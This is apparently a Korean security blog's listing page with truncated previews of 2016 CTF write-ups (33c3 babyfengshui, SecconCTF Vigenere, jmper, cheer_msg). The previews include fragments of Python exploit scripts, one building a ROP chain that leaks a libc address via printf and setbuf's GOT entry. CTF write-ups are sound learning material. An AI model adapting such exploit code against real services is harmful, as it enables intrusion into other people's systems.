반응형 2016/125 [exploit] 2016 33c3 CTF - babyfengshui #!/usr/bin/env python import socket import struct import telnetlib p = lambda x: struct.pack( " 2016. 12. 30. [crypto] 2016 SecconCTF - Vigenere writeups [문제] Vigenere k: ???????????? p: SECCON{???????????????????????????????????} c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe [풀이] import md5 p = "SECCON{???????????????????????????????????}" c = 'LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ' m = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}" a = [] for i in range(len(p[:7])): for j in range.. 2016. 12. 12. [exploit] 2016 SecconCTF - jmper writeups (exploit only) #!/usr/bin/env python import socket import telnetlib import struct from collections import deque p = lambda x: struct.pack( " 2016. 12. 11. [exploit] 2016 SecconCTF - cheer_msg writeups (exploit only) #!/usr/bin/env python import socket import struct import telnetlib p = lambda x: struct.pack( "" ) s.send( "-150\n" ) u_recv( "Message >>" ) pay = p( printf_plt ) pay += p( pppr ) pay += p( 0x804887d ) # \nThank you %s!\nMessage : %s\n pay += p( setbuf_got ) pay += p( setbuf_got ) pay += p( 0x80485ca ) # main s.send( pay+"\n" ) data = u_recv( "Message : " ) data = u_recv( "Message : " ) data = d.. 2016. 12. 11. 이전 1 2 다음 728x90